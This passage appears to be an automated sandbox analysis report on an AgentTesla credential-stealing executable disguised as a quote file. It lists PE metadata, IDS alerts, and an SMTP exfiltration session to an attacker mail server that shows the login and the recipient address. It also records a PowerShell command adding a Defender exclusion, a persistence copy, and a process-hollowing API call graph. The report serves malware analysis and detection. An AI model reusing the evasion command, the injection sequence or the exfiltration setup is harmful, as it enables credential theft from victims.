                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xa33680x70.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xa2cdc0xa2e003de32ca0fee023013c12bb43fbaee305False0.9267615598618573data7.8248096934652995IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xa60000x5b40x6009891bc64fcdf52c22bfe4f853826d640False0.4231770833333333data4.099143665645962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xa80000xc0x200c79a4a53e12cc62bf13fd126ee644310False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xa60900x324data0.43532338308457713
                                          RT_MANIFEST0xa63c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-09-26T09:06:54.339278+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549716108.167.140.123587TCP
                                          2024-09-26T09:06:54.339278+02002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.549716108.167.140.123587TCP
                                          2024-09-26T09:06:54.339278+02002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549716108.167.140.123587TCP
                                          2024-09-26T09:08:24.118030+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549716108.167.140.123587TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 26, 2024 09:08:22.437994003 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:22.443030119 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:22.443165064 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:23.087785006 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.088844061 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:23.093969107 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.243592024 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.283674955 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:23.288625002 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.438431025 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.439376116 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:23.444401026 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.607510090 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.607770920 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:23.614272118 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.763698101 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.763894081 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:23.768685102 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.962562084 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:23.962747097 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:23.967611074 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:24.117338896 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:24.117976904 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:24.118030071 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:24.118051052 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:24.118074894 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:08:24.122972965 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:24.122986078 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:24.122993946 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:24.123003006 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:24.278291941 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:08:24.323671103 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:10:02.105530024 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:10:02.110673904 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:10:02.466172934 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:10:02.466284037 CEST58749716108.167.140.123192.168.2.5
                                          Sep 26, 2024 09:10:02.468127012 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:10:02.472532034 CEST49716587192.168.2.5108.167.140.123
                                          Sep 26, 2024 09:10:02.478195906 CEST58749716108.167.140.123192.168.2.5

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 26, 2024 09:08:22.089580059 CEST6316953192.168.2.51.1.1.1
                                          Sep 26, 2024 09:08:22.423558950 CEST53631691.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Sep 26, 2024 09:08:22.089580059 CEST192.168.2.51.1.1.10x4cb3Standard query (0)mail.musabody.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Sep 26, 2024 09:08:22.423558950 CEST1.1.1.1192.168.2.50x4cb3No error (0)mail.musabody.com108.167.140.123A (IP address)IN (0x0001)false

                                          SMTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Sep 26, 2024 09:08:23.087785006 CEST58749716108.167.140.123192.168.2.5220-gator4156.hostgator.com ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 02:08:23 -0500
                                          220-We do not authorize the use of this system to transport unsolicited,
                                          220 and/or bulk e-mail.
                                          Sep 26, 2024 09:08:23.088844061 CEST49716587192.168.2.5108.167.140.123EHLO 134349
                                          Sep 26, 2024 09:08:23.243592024 CEST58749716108.167.140.123192.168.2.5250-gator4156.hostgator.com Hello 134349 [8.46.123.33]
                                          250-SIZE 52428800
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-PIPECONNECT
                                          250-AUTH PLAIN LOGIN
                                          250-STARTTLS
                                          250 HELP
                                          Sep 26, 2024 09:08:23.283674955 CEST49716587192.168.2.5108.167.140.123AUTH login dmljdG9yaWFAbXVzYWJvZHkuY29t
                                          Sep 26, 2024 09:08:23.438431025 CEST58749716108.167.140.123192.168.2.5334 UGFzc3dvcmQ6
                                          Sep 26, 2024 09:08:23.607510090 CEST58749716108.167.140.123192.168.2.5235 Authentication succeeded
                                          Sep 26, 2024 09:08:23.607770920 CEST49716587192.168.2.5108.167.140.123MAIL FROM:<victoria@musabody.com>
                                          Sep 26, 2024 09:08:23.763698101 CEST58749716108.167.140.123192.168.2.5250 OK
                                          Sep 26, 2024 09:08:23.763894081 CEST49716587192.168.2.5108.167.140.123RCPT TO:<pritchardchristopher281@gmail.com>
                                          Sep 26, 2024 09:08:23.962562084 CEST58749716108.167.140.123192.168.2.5250 Accepted
                                          Sep 26, 2024 09:08:23.962747097 CEST49716587192.168.2.5108.167.140.123DATA
                                          Sep 26, 2024 09:08:24.117338896 CEST58749716108.167.140.123192.168.2.5354 Enter message, ending with "." on a line by itself
                                          Sep 26, 2024 09:08:24.118074894 CEST49716587192.168.2.5108.167.140.123.
                                          Sep 26, 2024 09:08:24.278291941 CEST58749716108.167.140.123192.168.2.5250 OK id=1stibw-003smC-07
                                          Sep 26, 2024 09:10:02.105530024 CEST49716587192.168.2.5108.167.140.123QUIT
                                          Sep 26, 2024 09:10:02.466172934 CEST58749716108.167.140.123192.168.2.5221 gator4156.hostgator.com closing connection

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:03:06:56
                                          Start date:26/09/2024
                                          Path:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                                          Imagebase:0x490000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:03:06:57
                                          Start date:26/09/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                                          Imagebase:0x9c0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:03:06:57
                                          Start date:26/09/2024
                                          Path:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                                          Imagebase:0xfa0000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:5
                                          Start time:03:06:57
                                          Start date:26/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:03:07:00
                                          Start date:26/09/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:03:07:09
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0x850000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 58%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:03:07:10
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xf90000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2259031078.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:03:07:17
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xa80000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:03:07:18
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xe30000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4509557072.000000000319B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:10.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:242
                                            Total number of Limit Nodes:12
                                            execution_graph 34927 6f8a888 34928 6f8a8ae 34927->34928 34929 6f8aa13 34927->34929 34928->34929 34931 6f88c44 34928->34931 34932 6f8ab08 PostMessageW 34931->34932 34933 6f8ab74 34932->34933 34933->34928 34644 6f87e6d 34646 6f87d8f 34644->34646 34645 6f880b6 34646->34645 34651 6f895c0 34646->34651 34670 6f89626 34646->34670 34690 6f89581 34646->34690 34709 6f895a0 34646->34709 34652 6f895da 34651->34652 34653 6f895e2 34652->34653 34728 6f8a053 34652->34728 34736 6f89c52 34652->34736 34741 6f8a078 34652->34741 34749 6f89fc6 34652->34749 34757 6f89c85 34652->34757 34762 6f89ac3 34652->34762 34770 6f89b02 34652->34770 34775 6f89ca1 34652->34775 34780 6f89a00 34652->34780 34784 6f89aef 34652->34784 34790 6f89ed7 34652->34790 34795 6f89dd5 34652->34795 34803 6f89b94 34652->34803 34808 6f89e34 34652->34808 34816 6f89b73 34652->34816 34821 6f89df3 34652->34821 34653->34645 34671 6f895b4 34670->34671 34672 6f89629 34670->34672 34673 6f8a078 4 API calls 34671->34673 34674 6f89c52 2 API calls 34671->34674 34675 6f8a053 4 API calls 34671->34675 34676 6f89df3 2 API calls 34671->34676 34677 6f89b73 2 API calls 34671->34677 34678 6f89e34 4 API calls 34671->34678 34679 6f89b94 2 API calls 34671->34679 34680 6f89dd5 4 API calls 34671->34680 34681 6f89ed7 2 API calls 34671->34681 34682 6f895e2 34671->34682 34683 6f89aef 2 API calls 34671->34683 34684 6f89a00 2 API calls 34671->34684 34685 6f89ca1 2 API calls 34671->34685 34686 6f89b02 2 API calls 34671->34686 34687 6f89ac3 4 API calls 34671->34687 34688 6f89c85 2 API calls 34671->34688 34689 6f89fc6 4 API calls 34671->34689 34672->34645 34673->34682 34674->34682 34675->34682 34676->34682 34677->34682 34678->34682 34679->34682 34680->34682 34681->34682 34682->34645 34683->34682 34684->34682 34685->34682 34686->34682 34687->34682 34688->34682 34689->34682 34691 6f895f5 34690->34691 34701 6f8958a 34690->34701 34692 6f8a078 4 API calls 34691->34692 34693 6f89c52 2 API calls 34691->34693 34694 6f8a053 4 API calls 34691->34694 34695 6f89df3 2 API calls 34691->34695 34696 6f89b73 2 API calls 34691->34696 34697 6f89e34 4 API calls 34691->34697 34698 6f89b94 2 API calls 34691->34698 34699 6f89dd5 4 API calls 34691->34699 34700 6f89ed7 2 API calls 34691->34700 34691->34701 34702 6f89aef 2 API calls 34691->34702 34703 6f89a00 2 API calls 34691->34703 34704 6f89ca1 2 API calls 34691->34704 34705 6f89b02 2 API calls 34691->34705 34706 6f89ac3 4 API calls 34691->34706 34707 6f89c85 2 API calls 34691->34707 34708 6f89fc6 4 API calls 34691->34708 34692->34701 34693->34701 34694->34701 34695->34701 34696->34701 34697->34701 34698->34701 34699->34701 34700->34701 34701->34645 34702->34701 34703->34701 34704->34701 34705->34701 34706->34701 34707->34701 34708->34701 34710 6f895b4 34709->34710 34711 6f8a078 4 API calls 34710->34711 34712 6f89c52 2 API calls 34710->34712 34713 6f8a053 4 API calls 34710->34713 34714 6f89df3 2 API calls 34710->34714 34715 6f89b73 2 API calls 34710->34715 34716 6f89e34 4 API calls 34710->34716 34717 6f89b94 2 API calls 34710->34717 34718 6f89dd5 4 API calls 34710->34718 34719 6f89ed7 2 API calls 34710->34719 34720 6f895e2 34710->34720 34721 6f89aef 2 API calls 34710->34721 34722 6f89a00 2 API calls 34710->34722 34723 6f89ca1 2 API calls 34710->34723 34724 6f89b02 2 API calls 34710->34724 34725 6f89ac3 4 API calls 34710->34725 34726 6f89c85 2 API calls 34710->34726 34727 6f89fc6 4 API calls 34710->34727 34711->34720 34712->34720 34713->34720 34714->34720 34715->34720 34716->34720 34717->34720 34718->34720 34719->34720 34720->34645 34721->34720 34722->34720 34723->34720 34724->34720 34725->34720 34726->34720 34727->34720 34729 6f8a096 34728->34729 34825 6f86bf8 34729->34825 34829 6f86c00 34729->34829 34730 6f8a0ab 34833 6f870e8 34730->34833 34837 6f870e1 34730->34837 34731 6f8a1be 34737 6f89bab 34736->34737 34738 6f89a58 34737->34738 34841 6f875f8 34737->34841 34845 6f875f1 34737->34845 34738->34653 34742 6f8a07e 34741->34742 34747 6f86bf8 ResumeThread 34742->34747 34748 6f86c00 ResumeThread 34742->34748 34743 6f8a0ab 34745 6f870e8 Wow64SetThreadContext 34743->34745 34746 6f870e1 Wow64SetThreadContext 34743->34746 34744 6f8a1be 34745->34744 34746->34744 34747->34743 34748->34743 34750 6f89dec 34749->34750 34755 6f86bf8 ResumeThread 34750->34755 34756 6f86c00 ResumeThread 34750->34756 34751 6f8a0ab 34753 6f870e8 Wow64SetThreadContext 34751->34753 34754 6f870e1 Wow64SetThreadContext 34751->34754 34752 6f8a1be 34753->34752 34754->34752 34755->34751 34756->34751 34758 6f89b19 34757->34758 34758->34757 34759 6f89abf 34758->34759 34849 6f876b8 34758->34849 34853 6f876b0 34758->34853 34759->34653 34763 6f89adc 34762->34763 34764 6f89e48 34763->34764 34766 6f86bf8 ResumeThread 34763->34766 34767 6f86c00 ResumeThread 34763->34767 34768 6f870e8 Wow64SetThreadContext 34764->34768 34769 6f870e1 Wow64SetThreadContext 34764->34769 34765 6f8a1be 34766->34764 34767->34764 34768->34765 34769->34765 34771 6f89b08 34770->34771 34772 6f89abf 34771->34772 34773 6f876b8 WriteProcessMemory 34771->34773 34774 6f876b0 WriteProcessMemory 34771->34774 34772->34653 34773->34771 34774->34771 34777 6f89bab 34775->34777 34776 6f8a29d 34776->34653 34777->34776 34778 6f875f8 VirtualAllocEx 34777->34778 34779 6f875f1 VirtualAllocEx 34777->34779 34778->34777 34779->34777 34857 6f87940 34780->34857 34861 6f87934 34780->34861 34785 6f89afc 34784->34785 34787 6f89a58 34784->34787 34788 6f870e8 Wow64SetThreadContext 34785->34788 34789 6f870e1 Wow64SetThreadContext 34785->34789 34786 6f89fb3 34787->34653 34788->34786 34789->34786 34791 6f89efa 34790->34791 34793 6f876b8 WriteProcessMemory 34791->34793 34794 6f876b0 WriteProcessMemory 34791->34794 34792 6f8a3c1 34793->34792 34794->34792 34796 6f89ddb 34795->34796 34801 6f86bf8 ResumeThread 34796->34801 34802 6f86c00 ResumeThread 34796->34802 34797 6f8a0ab 34799 6f870e8 Wow64SetThreadContext 34797->34799 34800 6f870e1 Wow64SetThreadContext 34797->34800 34798 6f8a1be 34799->34798 34800->34798 34801->34797 34802->34797 34804 6f89b9a 34803->34804 34805 6f8a29d 34804->34805 34806 6f875f8 VirtualAllocEx 34804->34806 34807 6f875f1 VirtualAllocEx 34804->34807 34805->34653 34806->34804 34807->34804 34811 6f89e3a 34808->34811 34809 6f89e48 34814 6f870e8 Wow64SetThreadContext 34809->34814 34815 6f870e1 Wow64SetThreadContext 34809->34815 34810 6f8a1be 34811->34809 34812 6f86bf8 ResumeThread 34811->34812 34813 6f86c00 ResumeThread 34811->34813 34812->34809 34813->34809 34814->34810 34815->34810 34817 6f89b7c 34816->34817 34819 6f876b8 WriteProcessMemory 34817->34819 34820 6f876b0 WriteProcessMemory 34817->34820 34818 6f89c33 34818->34653 34819->34818 34820->34818 34822 6f89e00 34821->34822 34865 6f877a8 34822->34865 34869 6f877a1 34822->34869 34826 6f86c40 ResumeThread 34825->34826 34828 6f86c71 34826->34828 34828->34730 34830 6f86c40 ResumeThread 34829->34830 34832 6f86c71 34830->34832 34832->34730 34834 6f8712d Wow64SetThreadContext 34833->34834 34836 6f87175 34834->34836 34836->34731 34838 6f8712d Wow64SetThreadContext 34837->34838 34840 6f87175 34838->34840 34840->34731 34842 6f87638 VirtualAllocEx 34841->34842 34844 6f87675 34842->34844 34844->34737 34846 6f875f8 VirtualAllocEx 34845->34846 34848 6f87675 34846->34848 34848->34737 34850 6f87700 WriteProcessMemory 34849->34850 34852 6f87757 34850->34852 34852->34758 34854 6f87700 WriteProcessMemory 34853->34854 34856 6f87757 34854->34856 34856->34758 34858 6f879c9 CreateProcessA 34857->34858 34860 6f87b8b 34858->34860 34862 6f87940 CreateProcessA 34861->34862 34864 6f87b8b 34862->34864 34866 6f877f3 ReadProcessMemory 34865->34866 34868 6f87837 34866->34868 34868->34822 34870 6f877a8 ReadProcessMemory 34869->34870 34872 6f87837 34870->34872 34872->34822 34934 275d380 34935 275d3c6 GetCurrentProcess 34934->34935 34937 275d411 34935->34937 34938 275d418 GetCurrentThread 34935->34938 34937->34938 34939 275d455 GetCurrentProcess 34938->34939 34940 275d44e 34938->34940 34941 275d48b 34939->34941 34940->34939 34942 275d4b3 GetCurrentThreadId 34941->34942 34943 275d4e4 34942->34943 34873 4dd4380 34876 4dd3378 34873->34876 34875 4dd438d 34877 4dd3383 34876->34877 34881 2755d58 34877->34881 34885 27572f7 34877->34885 34878 4dd4524 34878->34875 34882 2755d63 34881->34882 34889 2755d88 34882->34889 34884 27573ad 34884->34878 34886 2757302 34885->34886 34887 2755d88 GetModuleHandleW 34886->34887 34888 27573ad 34887->34888 34888->34878 34890 2755d93 34889->34890 34892 275890b 34890->34892 34895 275abb3 34890->34895 34891 2758949 34891->34884 34892->34891 34898 275cca0 34892->34898 34903 275aff0 34895->34903 34899 275ccd1 34898->34899 34900 275ccf5 34899->34900 34911 275d268 34899->34911 34915 275d258 34899->34915 34900->34891 34906 275b0e8 34903->34906 34904 275abc6 34904->34892 34907 275b11c 34906->34907 34908 275b0f9 34906->34908 34907->34904 34908->34907 34909 275b320 GetModuleHandleW 34908->34909 34910 275b34d 34909->34910 34910->34904 34913 275d275 34911->34913 34912 275d2af 34912->34900 34913->34912 34919 275d0a0 34913->34919 34916 275d268 34915->34916 34917 275d2af 34916->34917 34918 275d0a0 GetModuleHandleW 34916->34918 34917->34900 34918->34917 34920 275d0ab 34919->34920 34922 275dbc0 34920->34922 34923 275d1bc 34920->34923 34924 275d1c7 34923->34924 34925 2755d88 GetModuleHandleW 34924->34925 34926 275dc2f 34925->34926 34926->34922 34944 275d5c8 DuplicateHandle 34945 275d65e 34944->34945

                                            Executed Functions

                                            Function 06F81DB8 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a7853c8c155a339d62e6471beb3b859b7a57c242ff344a1046b4991e2ec4a7d
                                            • Instruction ID: 4469080de0506e018ff475803bc35df6c25836bef3ac1599c76977faa5fa464b
                                            • Opcode Fuzzy Hash: 4a7853c8c155a339d62e6471beb3b859b7a57c242ff344a1046b4991e2ec4a7d
                                            • Instruction Fuzzy Hash: E531E8B1D00618CFEB58DF9BD8447EEBBF6AF88301F14C0AAD409AA254DB751946CF90
                                            Function 06F81DA8 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db286c69524ac2154ed9d70bf53f1e4a389e306bae51a0b413e2663c724e61d7
                                            • Instruction ID: 9d027f5c8ec3f0f240c481decb1942d96df431b6fa3d80b2ba22181789d2adce
                                            • Opcode Fuzzy Hash: db286c69524ac2154ed9d70bf53f1e4a389e306bae51a0b413e2663c724e61d7
                                            • Instruction Fuzzy Hash: 3B21E7B1D016188FEB58DFABD8443DEBFF6AF88300F14C1AAD4096A254DB750946CF90
                                            Function 06F89A6C Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a4b27af3c4969b17d4e55ee4cfdbeade2167bd9d87393ba8f74d79247dfd420
                                            • Instruction ID: c0e8ed4358aaf1ea171d3fd73868454a740506f87b586d6587776ec2af748314
                                            • Opcode Fuzzy Hash: 0a4b27af3c4969b17d4e55ee4cfdbeade2167bd9d87393ba8f74d79247dfd420
                                            • Instruction Fuzzy Hash: 58F0F871D092ACCFDBD4EE298C402FCB6B5AB8B300F40A4D2C11DA6100D6744AC5CE88
                                            Function 0275D371 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
